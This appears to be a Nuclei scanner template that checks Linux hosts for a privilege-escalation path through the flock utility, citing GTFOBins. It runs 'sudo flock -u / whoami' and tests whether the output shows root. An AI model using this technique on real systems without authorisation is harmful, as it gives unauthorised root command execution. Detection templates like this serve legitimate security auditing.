flock is a command-line utility in Unix-like operating systems that is used to manage file locks. It can be used to synchronize access to a file among multiple processes, preventing conflicts and ensuring data integrity. Additionally, flock can be used in shell scripts to control access to critical sections of code.
PoC代码[已公开]
id: privesc-flock
info:
name: Flock - Privilege Escalation
author: daffainfo
severity: high
description: |
flock is a command-line utility in Unix-like operating systems that is used to manage file locks. It can be used to synchronize access to a file among multiple processes, preventing conflicts and ensuring data integrity. Additionally, flock can be used in shell scripts to control access to critical sections of code.
reference:
- https://gtfobins.github.io/gtfobins/flock/
metadata:
verified: true
max-request: 3
tags: code,linux,flock,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
flock -u / whoami
- engine:
- sh
- bash
source: |
sudo flock -u / whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450220072bde0174a1fa2f7a052070195451b79aad0293aaa92ee3b143357e26b42e0f022100961ad3876b40112db2ec728c93f061b3a2f049579b56c117f9588426ddb1b5d9:922c64590222798bb761d5b6d8e72950